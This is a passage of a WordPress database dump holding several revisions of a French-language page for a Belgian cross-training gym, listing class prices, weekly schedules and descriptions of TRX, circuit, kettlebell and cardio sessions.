carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:28:10', '2013-06-16 14:28:10', '', 11, 'http://www.crosstrainingcenter.be/?p=123', 0, 'revision', '', 0),
(219, 1, '2013-07-03 18:25:11', '2013-07-03 18:25:11', '<h2>Prix</h2>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-2', '', '', '2013-07-03 18:25:11', '2013-07-03 18:25:11', '', 214, 'http://www.crosstrainingcenter.be/?p=219', 0, 'revision', '', 0),
(124, 1, '2013-06-16 14:33:05', '2013-06-16 14:33:05', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:33:05', '2013-06-16 14:33:05', '', 11, 'http://www.crosstrainingcenter.be/?p=124', 0, 'revision', '', 0),
(125, 1, '2013-06-16 14:34:31', '2013-06-16 14:34:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 0px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 0px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:34:31', '2013-06-16 14:34:31', '', 11, 'http://www.crosstrainingcenter.be/?p=125', 0, 'revision', '', 0),
(206, 1, '2013-07-03 18:02:08', '2013-07-03 18:02:08', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>\r\nDuo Training :</h2>\r\nUniquement sur rdv\r\n\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\n\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\n\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:02:08', '2013-07-03 18:02:08', '', 11, 'http://www.crosstrainingcenter.be/?p=206', 0, 'revision', '', 0),
(205, 1, '2013-07-03 17:58:05', '2013-07-03 17:58:05', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n\r\n<br><br>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les 